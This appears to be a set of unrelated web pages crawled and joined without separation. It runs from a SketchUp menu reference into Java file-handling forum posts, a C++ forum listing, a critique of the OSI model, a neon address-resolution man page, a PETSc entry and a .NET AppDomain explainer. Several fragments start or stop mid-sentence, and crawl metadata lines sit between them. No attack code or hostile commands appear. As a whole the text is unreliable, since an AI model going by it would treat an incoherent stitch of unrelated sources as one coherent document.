edges. Most often, these edges are created by using the Freehand
tool.
Creates a flat triangulated TIN that you can sculpt using sandbox
tools such as the Smoove tool (Tools → Sandbox →
Smoove).
The Tools menu holds most of the non-drawing tools, including the basic
Select, Move, Rotate, and Scale tools. You also find some of the tools that make
SketchUp unique, such as the Push/Pull, Follow Me, and Offset tools. Several of
these tools use the Measurements toolbar (the section called “A Tour of SketchUp's Main Window”) to perform their tasks with
accuracy.
Windows: Space bar
Mac: Space bar; ⌘-/
Activates the Select tool (and generally ends the operation of other
SketchUp tools). Often you must select a SketchUp entity before using other
tools or commands. For example, you must select several lines and edges
(entities) before making a group or component. Click an entity once to
select it. Click twice to select the entity and the other entities
immediately touching it. Click three times to select the entity and all the
entities that are connected to it by edges and faces.
You can drag to make a selection, but keep in mind that the Select
tool behaves differently depending on whether you drag it to the left or
to the right (the section called “Speeding Up Construction with Arrays”).
Drag to the right and the Select tool selects entities that are
completely within the selection window. Drag to the left to select every
entity that is partially within the selection window.
Windows: E
Mac: E
Activates the Eraser tool (the section called “Erasing Lines and Surfaces”).
Click entities to erase them, or drag to erase several entities at a time.
To hide an edge, press Shift while clicking the edge. To soften an edge
(making the angle less acute), press Ctrl (Option on a Mac) while clicking
the edge.
Windows: B
Mac: B
Activates the Paint Bucket tool (think B for bucket). Choose colors and
textures from the Materials window (Windows → Materials); then click
a face to paint it (the section called “Applying Colors and Materials (Windows)”). Press Alt (⌘ on a Mac), and the bucket turns into an eyedropper.
Click the eyedropper on faces with color or materials to load the Paint
Bucket tool with the color or material.
Windows: M
Mac: M; ⌘-0
Activates the Move tool (the section called “Moving, Copying, and Deleting Components”). Move edges, faces,
groups, or components using the click-move-click method. Click an entity,
and it becomes attached to the cursor. Move to a new location, and click to
place the entity. You can also use the Move tool to rotate groups and
components. Hold the Move tool over a group or component, and red crosses
appear at certain locations. Hold the cursor over a cross, and it displays
the Rotate cursor. Rotate the object using the techniques described for the
Rotate command (next). Toggle the Ctrl key (Option on a Mac) to put the Move
tool in copy mode. The original entity remains in place; a copy of the
entity is moved to the new location. You can move an entity with precision
by clicking the entity with the Move tool and then typing a distance. The
distance with a measurement, such as 4', appears in the
Measurements toolbar. Press Enter (Return), and the entity moves the
specified distance.
Windows: Q
Mac: Q; ⌘-8
Activates the Rotate tool (the section called “Rotating an Object”). The
cursor looks like a protractor and determines the plane of rotation. To
rotate entities, click one point, and the cursor displays a rubber band
line; click another point to set a temporary line. Then as you move the
cursor, the entity rotates around the first point you clicked. Click a third
and final time to complete the rotation. Toggle the Ctrl key (Option on a
Mac) to put the Rotate tool in copy mode. The original entity remains in
place; you rotate a copy of the entity into position.
Windows: S
Mac: S; ⌘-9
Activates the Scale tool. Click an entity, and a bounding box with handles
appears around the entity. Hold the Scale cursor over one of the handles,
and a tooltip appears explaining the effect of dragging that particular
handle. For example, a message may say "Blue Scale About Opposite Point",
meaning the object will be scaled along the blue axis.
Windows: P
Mac: P; ⌘-=
Activates the Push/Pull tool, which is used to extrude faces into
three-dimensional objects. Click a face and then move the cursor
perpendicular to the surface. You can also type a dimension to extrude a
face with precision. For example, type 4' after
clicking a face, and the face is extruded 4 feet.
Activates the Follow Me tool, which extrudes a profile along a path.
Select the path first, and then click the face or profile to extrude.
Windows: F
Mac: F; ⌘- –(hyphen)
Activates the Offset tool, which is used to offset the edges of a face
(the section called “Using the Offset Tool”). For example, the Offset tool
lets you create a perfectly proportioned rectangle inside of another
rectangle with just two clicks. Click the edge that you want to offset, and
then move the cursor and click again. The original edge remains in place and
a duplicate appears at the point of the second click.
Windows: T
Mac: T
Activates the Tape Measure tool, which is used both for measuring
distances and for setting guides in your modeling window (the section called “Making Construction Lines”). To measure, click a point, move
the cursor, and then click a second point. The distance appears in the
Measurements toolbar. To create a guide, click an edge or face in the
modeling window, move the cursor to a new location, and click again. A guide
appears as a dashed line in the modeling window. Use Ctrl (Option) to toggle
Guide mode on and off. Erase individual guide lines using the Eraser tool.
Choose Edit → Delete Guides to remove all the guides in your
document. To hide guides temporarily, go to View → Guides.
Use the Protractor tool to measure angles and create guides based on
angles. The process requires three clicks. The first click sets the
intersection of the angle, a second click defines one line, and the third
click defines the second line. The measurement is shown in degrees in the
Measurements toolbar. You can also use the protractor to create guides. The
Ctrl (Option) key toggles Guide mode on and off. Erase individual guide
lines by using the Eraser tool. Choose Edit → Delete Guides to
remove all the guides in your document. To hide guides temporarily, go to
View → Guides.
Use the Axes command to reposition the Origin in the modeling window and
to change the alignment of the three axes. The Origin is the point where the
red, blue, and green axes meet. After choosing the command, click a location
in the modeling window to move the Origin to the new point.
Activates the Dimensions tool, which lets you place dimension marks and
labels in your document. To display the dimension of an edge, click the edge
(avoiding mid- and endpoints), and then move the cursor perpendicular to the
edge. Dimension text and marks appear; click to set their position. To make
other measurements, click to set one point, and then click again to set a
second point. Move the cursor away from the line created to position the
dimension lines and text. You can change typeface, size, and marker styles
by choosing Window → Model Info → Text.
Activates the Text tool. Click the Text tool in the modeling window to
place a text box. Type the text you want. To edit previously placed text,
double-click the text. You can reposition text using the Move tool. Text
isn't placed in the 3-D world—it's as if you placed it on the camera
lens. For example, text remains in the same position in the modeling window
even when you use tools such as Orbit and Pan. To place text
in the context of the 3-D world, use the 3D Text tool described next.
Opens the Place 3D Text window. Type the text you want, and use the
settings to choose a typeface and to format the text. Click Place to close
the window when you're done, and then click in your modeling window to place
the text. The block of text is a component listed in the Components window
(Windows → Component). You can manipulate text in the modeling
window using the standard tools such as Move and Rotate.
Mac: ⌘-Y
Used to create cutaway views of your model. Objects on one side of the
plane are hidden. Click a point in your model to create a section plane
(the section called “View Cross-Sections with Section Planes”). You can
reposition section planes using the Move and Rotate tools.
The Google Earth commands help you coordinate your SketchUp modeling
activities with Google Earth tools.
Moves a Google Earth image into SketchUp. The most common use of this
command is to position a model accurately in terms of latitude and
longitude. SketchUp imports a black-and-white copy of the Google image
and orients it so that the green axis line points north.
Displays an image as terrain and indicates the elevations, after you
import a Google Earth image into SketchUp.
Sends your model to Google Earth by creating a temporary file of your
model and placing it in the proper location in Google Earth. You use
this technique primarily while modeling (the section called “Exporting 3-D Images”). You can remove models from Google
Earth by right-clicking the model name in the Places (or Temporary
Places) folder and then choosing Delete.
Lets you manipulate dynamic models in SketchUp. For example, a door or
window may open and close when you click it with the Interact tool.
Sandbox tools let you model terrain and other organic shapes inside of
SketchUp. The design element used to create these shapes is referred to as a
TIN or triangulated irregular network. TINs are
automatically stored in groups, so you must double-click the shape before
editing.
Sculpts terrain or organic shapes formed by a TIN. The Smoove tool
highlights the area to be changed. After activating the Smoove tool, you
can adjust the area affected by the Smoove tool by typing a radius like
20'. The number appears in the Measurements
toolbar, and the size of the highlight changes accordingly.
Use the Stamp tool to create impressions on the TIN by "pressing"
geometry into the surface.
Lets you project edges (lines) over the irregular surface of a
TIN.
Subdivides certain areas of the TIN, made up of lots of small
triangles, into even smaller triangles. You can then sculpt finer
details. It also adds to the complexity of your SketchUp model.
Lets you manually make adjustments to the TIN. It's particularly
useful when unwanted flat areas appear in terrain developed from contour
lines.
SketchUp's extensive Windows menu is used to open windows where you manage
your model and its features like components, styles, layers, and scenes. You do
a lot of your SketchUp project management and fine-tuning in some of these
windows. The options under the Windows menu are slightly different in
Windows and on a Mac.
Mac: ⌘-M
Hides the active SketchUp modeling window. You can show the window again
by clicking its icon in the Dock.
Expands (or shrinks) the size of the SketchUp modeling window
onscreen.
Mac: Shift-⌘-I
Opens the Model Info window, where you can change settings related to your
model. General categories for these settings are Animation, Components,
Credits, Dimensions, File, Location, Rendering, Statistics, Text, and
Units.
Mac: ⌘-I
Opens the Entity Info window, where you can change settings related to the
selected entity. (An entity may be a single edge or face, a selection of
edges and faces, or a group or complex component.) Use the Entity Info box
to manage layers, show and hide entities, and manage shadow behavior. Entity
Info is always available from a shortcut menu by right-clicking.
Mac: Shift-⌘-C
Opens the Materials window, where you manage and edit materials and colors
that are applied to faces in your model.
Use the Components window to manage the components in your model. The
Search feature gives you direct access to the 3D Warehouse (the section called “Placing Components in Your Model”), where you find thousands
of SketchUp components that are ready to use. The Edit tab lets you change
the alignment or glue-to settings for your components (the section called “Saving Components for Reuse”). The Statistics tab gives you a
running list of the entities and elements inside of a component.
Opens the Styles window, where you manage the appearance of your SketchUp
model. With a click of a button, you can dramatically change the appearance
of the edges and faces in your model.
Layers (the section called “Working with Layers”) are a way to show and hide
portions of your SketchUp model. The Layers window lets you add and remove
layers and control their visibility.
Opens the Outliner, where you can manage your model's groups and
components. The Outliner lets you name and create nested groups and
components. It's also a handy way to find groups and components that have
been hidden using the Hide command. You can access the shortcut menu for any
group or component by right-clicking its name in the Outliner.
Use the Scenes window to create, update, and remove scenes from your
document. By reordering scenes in the list, you can change their order in
animations. You can save or update specific visual properties in your scenes
such as camera location, hidden geometry, visible layers, section panes,
style and fog, shadow settings, and axes location.
Mac: ⌘-T
Opens the standard Mac Fonts window used to specify typeface and font
size.
Opens the Shadow Settings window used to show or hide shadows. You can use
the Time and Date settings to control the angle of shadows. The Light and
Dark slider controls let you fine-tune the appearance of shadows.
Opens the Fog window, where you can show or hide fog in the SketchUp
modeling window. Settings in the window let you control the intensity and
appearance of the fog effect.
Starts the Match Photo process (the section called “How Photo Match Works”),
which lets you bring photos in the SketchUp modeling window and then arrange
the view so you can accurately create a 3-D model using the photo for
reference points.
Changes the appearance and angle of the selected edges in your
model.
Displays a few basic, animated tutorials for SketchUp.
In Windows, this option opens the Preferences window, where you can adjust
some of the settings for SketchUp including the Template that SketchUp uses
when it starts a new document. On the Mac, you find this information under
SketchUp → Preferences. Other preferences include:
Location of files and libraries
Creation and timing of backups
Management of shortcut keys
Resolution of imported textures
Use of graphics card acceleration
Management of SketchUp extensions
Selection of an application to edit 2-D images
Hides some of the open windows and dialog boxes. (Oddly, this doesn't seem
to hide all of the open dialog boxes.)
Opens the Ruby Console, used to create and load add-on programs for
SketchUp—a topic not covered in this book.
Displays, in the Component Options window, details related to dynamic
components. Component developers may make some properties available to
designers using the component (the section called “Exploring the Components Window”). For example, a fence
component may let users change the height of the fence and the style of the
fence boards.
Opens the Component Attributes window, which displays spreadsheet-type
settings that you use to develop dynamic components.
Brings all open SketchUp windows to the foreground.
Displays the names of all the open modeling windows at the bottom of the
Windows menu. This system lets you jump back
and forth between models using menu commands.
All roads on the Help menu lead to Google one way or another. The
most helpful option in the bunch is the Online Help Center.
Opens the welcome window that you see when you first fire up SketchUp.
Turn off the "Always show on startup" checkbox if you don't want to see the
"Welcome to SketchUp" window every time you start SketchUp.
Takes you to SketchUp's web-based help system (the section called “SketchUp Help Center”). The advantage of having this system
on the Web is that Google can easily upgrade the help services. The
disadvantage is that you must have an Internet connection to get to the help
system. Online you find tutorials, videos, PDF documents, and user
forums.
Opens a window where you can provide feedback to Google and get
installation help. If you've purchased SketchUp Pro, you can receive
technical support.
Use the License menu options to activate and deactivate your SketchUp
license. (On the Mac, you find this information under SketchUp →
License.)
Quickly searches the Web to see if a newer version of SketchUp is
available. (On the Mac, you find this link under SketchUp → Check
for Web Updates.)
The About window displays information about your version of SketchUp and a
few links where you can get information, help, and license details. (On the
Mac, you find this information under SketchUp → About
SketchUp.)
If you enjoyed this excerpt, buy a copy of Google SketchUp: The Missing Manual .
© 2014, O’Reilly Media, Inc.
(707) 827-7019
(800) 889-8969
All trademarks and registered trademarks appearing on oreilly.com are the property of their respective owners.
|
http://www.oreillynet.com/pub/a/design/excerpts/google-sketchup-tmm/sketchup-menu.html
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
The above code works well. Thanks
are u ?
My project require ai algorithm code. Program like filter, sorting, search etc. I will be glad if you guys can be updating me with this codes.
Post your Comment
files
.
Please visit the following link:
files
files write a java program to calculate the time taken to read a given number of files. file names should be given at command line.
Hello Friend,
Try the following code:
import java.io.*;
import java.util.*;
class
header files
header files do you have a all header files of java
java files - Java Beginners
java files Hi!
How to create files (not temporary) when i got exception in my java program.
I want to write the complete exception in file...://
Thanks
files - Java Beginners
files Why do we require files to store data? Hi friend,
files to store data, easy to find and access them.
Thanks
Java files - Java Beginners
Java files i want to get an example on how to develop a Java OO application which reads, analyses, sorts, and displays student project marks.... The input files are structured as follows:
one student record per line
Reading files in Java
suggest for Reading files in Java?
Thanks...Reading files in Java I have to make a program in my project... file in Java. What is the best way to read the file in Java as its big file
Copy Files - Java Beginners
Copy Files I saw the post on copying multiple files () and I have something... a list of JPEG files that my boss gave me, and I was planning on putting them
configuration files - Java Beginners
configuration files i have to use configuration file in my program "listing of number of files and their modified time of directory",but problem is that directory name should be provided through configuratin file not input
listing files - Java Beginners
listing files how to list the files and number of files only...]);
System.exit(0);
default : System.out.println("Multiple files...]);
System.exit(0);
default : System.out.println("Multiple files are not allow
invoking exe files on sound
invoking exe files on sound how to invoke .exe files on input as sound in
list files only - Java Beginners
list files only i have to list only files and number of files in a directory?
i use list() method but it returns both files and directories in parent directory.are there any specific methods that show only files?
are file
regarding java files genarated by jsp
regarding java files genarated by jsp Hi,...
I'm running a project...: 233 in the generated java file
Syntax error, insert "}" to complete Block"
Where to find the genarated java file???
Thank u in advance
Compare 2 files
Compare 2 files I would like to compare 2 files in Java. please send me the code snipt for this scenario:
File1... to compare these files and print the diffrence by comparing the report name
quqtion on jar files
quqtion on jar files give me realtime examples on .jar class files
A Jar file combines several classes into a single archive file... through the following link:
Filter Files in Java
Filter Files in Java
Introduction
The Filter File Java example code provides the following functionalities:
Filtering the files depending on the file
Reading and Writing files - Java Beginners
Reading and Writing files Hello,
please help me to Develop a simple Java application that, when run, Welcomes the users and tells them the name... to investigate writing to files a little (can be also done using Properties
code for serching files and folders
code for serching files and folders i want to create a code in java...://
Displaying files on selection of date.
show the particular txt files of the selected date. I want the java logic for same.
Here is a java swing code that accepts two dates and search...Displaying files on selection of date. Hi,
I am developing a GUI
How do I decompile Java class files?
How do I decompile Java class files? How do I decompile Java class files
How to avoid Java Code in JSP-Files?
How to avoid Java Code in JSP-Files? How to avoid Java Code in JSP-Files
Thanks for the codeBinu July 5, 2012 at 2:18 PM
The above code works well. Thanks
happyhahaaa July 24, 2012 at 9:28 AM
are u ?
I need more AI code in javaAkhaumere Allen April 28, 2013 at 11:28 PM
My project require ai algorithm code. Program like filter, sorting, search etc. I will be glad if you guys can be updating me with this codes.
Post your Comment
|
http://www.roseindia.net/discussion/18333-Filter-Files-in-Java.html
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
Hi, I am going through SCJP material and I have a doubt regarding a question I came across in that material:,
Yes the answer is B alright.
Here is how it is :
Let us say A1 is the object that is referenced by a1, A2 is the one referenced by a2. Similarly, B1 for b1 and B2 for b2
a1.b1=1 and a2.b1=1 are static fields. so even when a1=null, a2.b1 holds a reference to B1
And a2.b2=b2 holds the reference to the object B2.
So only A1 has no reference ( A2 is referenced by a2).
Thus only A1 is eligible for garbage collection
Hi Pradeep, Thanks for your reply
Here the a2.b1=b1, is not assigned in the code. But still since a1.b1 is static and is made to point to b1, the object of B1, are you saying that the b1 will stay alive until the class ends?
I can understand the reason why the object of b2 will stay alive, since a2.b2 is made to point to it.
Thanks
Code is hard to read. Following is broken down with comments that explain each reference.
class Beta { } class Alpha { static Beta b1; // Reference X1 Beta b2; // Reference X2 } public class Tester { public static void main(String[] args) { Beta b1 = new Beta(); // Reference Y1 - Instance 1 Beta b2 = new Beta(); // Reference Y2 - Instance 2 Alpha a1 = new Alpha(); // Reference Y3 - Instance 3 Alpha a2 = new Alpha(); // Reference Y4 - Instance 4 a1.b1 = b1; // Reference X1 set to Instance 1 a1.b2 = b1; // Reference Y3.X2 set to Instance 1 a2.b2 = b2; // Reference Y4.X2 set to Instance 2 a1 = null; // Reference Y3 clear b1 = null; // Reference Y1 clear b2 = null; // Reference Y2 clear // At this point there are 4 instances. // Result // Y4 is still set // Thus Instance 4 is still referenced // Thus Y4.X2 still set // Thus Instance 2 is still referenced // X1 is still set // Thus Instance Instance 1 is still referenced. // In the above 3 instances are still referenced // Thus there is one instance, Instance 3, which // is eligible. // do stuff } }
yes that's right... the class memory is shared by all of its objects. so a1.b1 is the same as a2.b1 .
|
https://community.oracle.com/message/11089105
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
Quick access
C++ Standards, Extensions, and Interop announcement
- Link)
- Sticky0Votes
Visual Studio 2010 Service Pack 1 and Windows SDK for Windows 7, .NET Framework 4 and X64/IA64 Visual C++ Compilers IssueVisual Studio 2010 Service Pack 1 and Windows SDK for Windows 7, .NET Framework 4 and X64/IA64 Visual C++ Compilers Issue Microsoft has identified an issue for users of the ...0 Replies | 14715 Views | Created by Yi Feng Li - Wednesday, March 09, 2011 3:08 AM
- Sticky0Votes
High quality, low static: An answering "HOW-TO"So you've decided to contribute in the C++ forums. First of all: Thanks! High quality input is always welcome, and nothing is better than fresh blood (with fresh ideas and solutions). Now that you've ...
- Sticky0Votes
Visual C++ Language forum: The scope, tips and pointersWelcome to the Visual C++ Language forum! The scope of this forum is the C++ language, compiler and linker, and also covers all ...
- Sticky5Votes
Welcome to the Visual C++ Language ForumGreetings, This forum was created to address questions about writing code in C++. Visual C++ supports several programming language standards including the following: C - ISO C90 with ...0 Replies | 29400 Views | Created by Brandon Bray - Wednesday, May 18, 2005 8:39 PM
- Proposed1Votes
VS2013 C++ MFC: how to read a text file?Hello, I have previously used fstream member ifstream to open and read a text file in VS2003 (v.7) C++ MFC. This utilized a CString parameter from CFileDialog, as follows: CFileDialog ldFile(TRUE); if ...16 Replies | 138 Views | Created by JackCSB - Wednesday, March 05, 2014 7:47 PM | Last reply by WayneAKing - a few seconds ago
- Answered6Votes
Visual c++ load .ini files to comboboxI create pop up program for my company, I use Visual c++ CLR. I use .ini files for load and write data in my program. example data .ini files is ...13 Replies | 196 Views | Created by ray2091 - Tuesday, February 25, 2014 9:34 AM | Last reply by ray2091 - 1 hour 24 minutes ago
- Unanswered0Votes
LDAP Authenication On a Spring based WebPagehi, I have a webpage. This webpage is to authenticate customers to give permission access to access internet (like proxy server). This web page is developed ...1 Replies | 59 Views | Created by Ajvad Rahman - Thursday, March 06, 2014 8:57 AM | Last reply by May Wang - MSFT - 4 hours 18 minutes ago
- Answered1Votes
Is There Any Message Sent To Window When It Loses Focus?Is There Any Message Sent To Window When It Loses Focus ? It No Then How To Know When Window Loses Its Focus ?1 Replies | 38 Views | Created by Z_4412 - 8 hours 27 minutes ago | Last reply by Igor Tandetnik - 7 hours 50 minutes ago
- Answered0Votes
Copy symantics for a native dll referenceAdd Reference). The native dll shows up, correctly, as a reference, and I can make sure the "Copy" attribute is set to true. But in the end it the native dll isn't copied. I've ...3 Replies | 3783 Views | Created by GordonTWatts - Monday, February 14, 2011 5:51 AM | Last reply by Bull Earwig - 13 hours 41 minutes ago
- Unanswered0Votes
Getting 100 Errors when trying to compile wdm.h/*++ BUILD Version: 0162 // Increment this if a change has global effects Copyright (c) Microsoft Corporation. All rights ...4 Replies | 65 Views | Created by plasma33 - Thursday, March 06, 2014 8:30 AM | Last reply by Viorel_ - 13 hours 48 minutes ago
- Unanswered0Votes
"ref class or value class"Hi Igor and everybody Can you please tell me when "ref class" or "ref value" is used and what they are. If you could give me simple examples, I would appreciate ...1 Replies | 53 Views | Created by chong kyong kim - 17 hours 52 minutes ago | Last reply by Mike Danes - 17 hours 10 minutes ago
- Unanswered0Votes
map problemHi,all, I am using a map store a number of <int, vector<MSXML2::IXMLDOMNodePtr> elements, like this: map<int, vector<MSXML2::IXMLDOMNodePtr>> ...0 Replies | 44 Views | Created by daiyueweng - 17 hours 57 minutes ago
- Unanswered0Votes
open network file, network utilization is very highHi Guys, When I tried to open a network file, I noticed that network utilization is very high, It seems transfer whole file over network while open the file. I have a mapped network ...4 Replies | 70 Views | Created by dxaw2000 - Thursday, March 06, 2014 2:28 AM | Last reply by Vegan Fanatic - 20 hours 46 minutes ago
- Answered1Votes
Which Message Is Sent To Windows When It Is Overlapped By Other Window ?Which Message Is Sent To Windows When It Is Overlapped By Other Window ?2 Replies | 51 Views | Created by Z_4412 - Thursday, March 06, 2014 8:13 AM | Last reply by Mike Danes - Thursday, March 06, 2014 9:46 AM
- Unanswered0Votes
dwDesiredAccess in CreateFile ?Hello Experts: When I use CreateFile to open a handle to a USB device, the API succeeded if I use 0 as the parameter "dwDesiredAccess"; it failed with "Access ...3 Replies | 132 Views | Created by PolarisEt - Sunday, March 02, 2014 8:07 PM | Last reply by May Wang - MSFT - Thursday, March 06, 2014 7:59 AM
- Answered0Votes
Calling the available networks dialog in windows 8I'm using a custom shell application written in c# and I'm attempting to call the view available networks dialog box in windows 8, I have a working example for windows 7. The bar in question ...2 Replies | 111 Views | Created by Andrew J Morgan - Tuesday, February 25, 2014 10:19 AM | Last reply by May Wang - MSFT - Thursday, March 06, 2014 2:26 AM
- Unanswered0Votes
Checking if Windows SystemRestore is enabled/disabled in C++ using WMIGet(L"RPSessionInterval", 0, &vtProp, &cimtype, 0); returns vpProp as VT_NULL and cimtype as 0x13(CIM_UINT32). Now, cimtype is proper and msdn says that if VT_NULL is ...1 Replies | 57 Views | Created by priyeshwadhwa - Wednesday, March 05, 2014 10:03 AM | Last reply by Renjith V Ramachandran - Wednesday, March 05, 2014 1:02 PM
- Answered1Votes
C++ need helpthe "f" for female is not being recognized so it is not outputting what it should and also the count statement is giving out an incorrect format could someone give me some pointers as ...10 Replies | 114 Views | Created by d100man - Tuesday, March 04, 2014 4:19 PM | Last reply by davewilk - Tuesday, March 04, 2014 9:16 PM
- Answered1Votes
How do I remove the External Dependencies folder from a library project?Hi, How do I remove the External Dependencies folder from a library project? I have multiple copies of a include file that I wish not to ...14 Replies | 5408 Views | Created by williamj8 - Saturday, September 18, 2010 1:19 AM | Last reply by mileskilometers - Tuesday, March 04, 2014 6:39 PM
- Unanswered0Votes
C++ programhi im new virtually new to c++ and i have been asked to designed a program that would do the following : Write a program that will interview 10 persons who wants to join ...5 Replies | 95 Views | Created by d100man - Tuesday, March 04, 2014 2:25 AM | Last reply by Pavel A - Tuesday, March 04, 2014 11:11 AM
- Proposed0Votes
Runtime Error - Microsoft Visual C++ Runtime LibraryEach time I login to my Windows Server 2012 machine, after few minutes I keep getting the Runtime Error, even if I close the dialog box, it keeps repeating for 3-4 times. Below ...1 Replies | 57 Views | Created by Vishwanath Uppala - Tuesday, March 04, 2014 5:54 AM | Last reply by Bordon - Tuesday, March 04, 2014 6:10 AM
- Unanswered0Votes
debugger not debuggingVisual Studio 2010 ... why the hell does the debugger not stop the execution of a program and show me an error when I have an access violation in a dll? We call a function of a dll, there we get an ...9 Replies | 114 Views | Created by Rudolf Meier - Monday, March 03, 2014 10:35 AM | Last reply by SimonRev - Tuesday, March 04, 2014 3:00 AM
- Unanswered0Votes
Ponter on char array code compile but does not runI am trying to run this code but it does not work. Kindly tell me whats the problem. The code is to reverse the string #include<iostream> using namespace ...5 Replies | 138 Views | Created by A.Zohra - Saturday, March 01, 2014 5:48 AM | Last reply by A.Zohra - Monday, March 03, 2014 6:29 AM
- Discussion0Votes
Access Violation without Memory LeakgetKey(ch)) { if( (ptr_to_current->test(0))->getX()==0) { moveTo(getX() - 2, getY()); } // user hit a key this tick! ...2 Replies | 161 Views | Created by Ly_Wang - Sunday, February 23, 2014 2:55 AM | Last reply by Jane Wang - MSFT - Monday, March 03, 2014 3:28 AM
-
|
http://social.msdn.microsoft.com/Forums/en-US/home?forum=vclanguage
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
OSI - a critique The OSI Model is often criticised as being overly complex, offering too many choices. It is usually contrasted with the Internet, or TCP/IP protocol suite by such critics. It is hard to separate the implementation from the specification when analysing these criticisms. For example, the idea that there are <#1644#> too many<#1644#> layers, simply does not hold water. A TP4/CLNP (the ISO Connection Oriented Transport Protocol in its appropriate class for running over the ISO datagram network protocol) implementation could be almost exactly as efficient as a TCP/IP one. Indeed there exist implementations that are. The model has its use as a reference to compare different protocol systems, and should be considered a major success as that model. The ISO protocols that instantiate the model in ISO stacks are a completely separate matter. The concept of layers introduced in the OSI model has two motivations: Primarily technically, but secondarily politically, it is a modularisation technique, taken from software engineering, and re-applied to the systems engineering of communications architectures (a term used instead of model). Secondarily technically, but primarily politically, each layer (module) can be implemented by a different supplier, to a service specification, and must only rely on the service specifications of other layers(modules) Why has this approach gone astray? For two reasons (at least), one technical, and the other political: The layering imposed politically, essentially reflects a protectionist approach to providers, such as PTTs, software and hardware vendors. but the world has moved on, and now we have much more mix and match, and the walls between types of provider have been broken down. Now, you might get your host from an entertainment company, your operating system from a PTT (e.g. Unix from AT&T), the communications software from a university (tcp/ip on a PC from UCL), and so forth. Software (and other) engineering has moved on a bit, and now software re-use (through object oriented and other techniques) means that we can take pieces of code in other peoples products and efficiently and safely adapt them to our requirements. Concrete trivial example might be use of bcopy (memcopy) by anyone in any layer of unix applications, despite its being designed for the o/s originally, with overloaded assignment in C++ perhaps being better ways to present it to the programmer - but what we don't have is millions of different copy functions, one for each layer of software. Basically, the layer/service model is like an extreme version of Pascal where you can only declare functions local to their use, and they can therefore only be used there! of course, the opposite extreme of C (all functions are global) may be too anarchic as well, although that argument is really to do with managing type complexity rather than the function namespace size. <#1717#>#tex2html_wrap4228#<#1717#>
|
http://www.cl.cam.ac.uk/~jac22/books/ods/ods/node227.html
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
#include <ne_socket.h>
The hostname passed to ne_addr_resolve can be a DNS hostname (e.g. "") or an IPv4 dotted quad (e.g. "192.0.34.72"); or, on systems which support IPv6, an IPv6 hex address, which may be enclosed in brackets, e.g. "[::1]".
To determine whether the hostname was successfully resolved, the ne_addr_result function is used, which returns non-zero if an error occurred. If an error did occur, the ne_addr_error function can be used, which will copy the error string into a given buffer (of size bufsiz).
The functions ne_addr_first and ne_addr_next are used to retrieve the Internet addresses associated with an address object which has been successfully resolved. ne_addr_first returns the first address; ne_addr_next returns the next address after the most recent call to ne_addr_next or ne_addr_first, or NULL if there are no more addresses. The ne_inet_addr pointer returned by these functions can be passed to ne_sock_connect to connect a socket.
After the address object has been used, it should be destroyed using ne_addr_destroy.
ne_addr_resolve returns a pointer to an address object, and never NULL. ne_addr_error returns the buffer parameter .
The code below prints out the set of addresses associated with the hostname.
ne_sock_addr *addr; char buf[256]; addr = ne_addr_resolve("", 0); if (ne_addr_result(addr)) { printf("Could not resolve: %s\n", ne_addr_error(addr, buf, sizeof buf)); } else { const ne_inet_addr *ia; printf(":"); for (ia = ne_addr_first(addr); ia != NULL; ia = ne_addr_next(addr)) { printf(" %s", ne_iaddr_print(ia, buf, sizeof buf)); } putchar('\n'); } ne_addr_destroy(addr);
ne_iaddr_print
Joe Orton <neon@lists.manyfish.co.uk>
|
http://www.makelinux.net/man/3/N/ne_addr_result
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
#include "petscksp.h" PetscErrorCode MatGetSchurComplement(Mat mat,IS isrow0,IS iscol0,IS isrow1,IS iscol1,MatReuse mreuse,Mat *newmat,MatReuse preuse,Mat *newpmat)Collective on Mat
Sometimes users would like to provide problem-specific data in the Schur complement, usually only for special row and column index sets. In that case, the user should call PetscObjectComposeFunction() to set "MatNestGetSubMat_C" to their function. If their function needs to fall back to the default implementation, it should call MatGetSchurComplement_Basic().
Level:advanced
Location:src/ksp/ksp/utils/schurm.c
Index of all KSP routines
Table of Contents for all manual pages
Index of all manual pages
|
http://www.mcs.anl.gov/petsc/petsc-current/docs/manualpages/KSP/MatGetSchurComplement.html
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
A colleague recently approached me about the concept of an application domain within ASP.NET. It took a minute to jog my memory about this security feature in the .NET Framework. If you could use a refresher on application domains, here's a quick overview of the concept.
What is it?
The Application Domain, known as AppDomain, provides a sandbox for .NET applications. An AppDomain is a container, or secure boundary, for code and data used by the .NET runtime. It is analogous to an operating system process used for an application and its data. The code and data is securely isolated within the boundaries of an AppDomain.
The goal of an AppDomain is to isolate the applications within it from all other application domains. That is, applications are protected from being affected by other applications running in different application domains. It provides stability.
This isolation of AppDomains is achieved by making sure exactly one application occupies unique parts of memory and scopes the resources for the process or application domain using that address space. The .NET runtime enforces AppDomain isolation by controlling memory usage. Application domains run on a single Win32 process. All AppDomain memory is managed by the runtime to ensure no overlap in memory usage.
It may seem like there is one AppDomain for every application, but the .NET Common Language Runtime (CLR) allows multiple applications to run within a single AppDomain. The CLR also verifies that the user code in an AppDomain is type safe. An assembly must be loaded into an AppDomain before it can execute. By default, the CLR loads an assembly into the AppDomain containing the code that references it.
The CLR automatically creates a default AppDomain when a process that hosts the CLR is created. This default AppDomain exists as long as the host process is alive. A good example of hosting the CLR is IIS.
ASP.NET
When a request first enters an ASP.NET application, the IIS-managed engine module creates an application domain; then the application domain performs the necessary processing tasks for the application, such as authentication.
When dealing with multiple ASP.NET applications on a server, the ASP.NET worker process will host all of them, but each one will have its own. The ensures that each application is protected from problems in another application. In addition, each application has its own set of global variables. Even though the code for both of the applications resides inside the same process, the unit of isolation is the .NET AppDomain.
An interesting caveat with ASP.NET and application domains is the fact that ASP.NET applications run with full trust rights by default. Applications running with full trust can execute native code and circumvent all security checks by the .NET runtime, so the security boundary provided by the application domain is moot. You can override the default behavior and run applications with partial trust to overcome this issue.
It is easy to see the benefits of the AppDomain concept, as applications are protected from harming others. It is great for ASP.NET hosting providers to protect customer applications from each other. In addition, the .NET Framework provides programmatic access to the application domain concept.
Programmatic access
You can find the AppDomain class in the base System namespace. The Microsoft documentation offers the following guidelines for using the AppDomain class:
-.
The AppDomain class allows you to create and manipulate your own application domains based upon your needs. The CreateDomain method is available to create a new application domain. The following C# snippet creates a new application domain and executes an assembly within the new application domain.
AppDomain domain = AppDomain.CreateDomain("TestAppDomain");
domain.ExecuteAssembly("AssemblyName.exe", null, args);
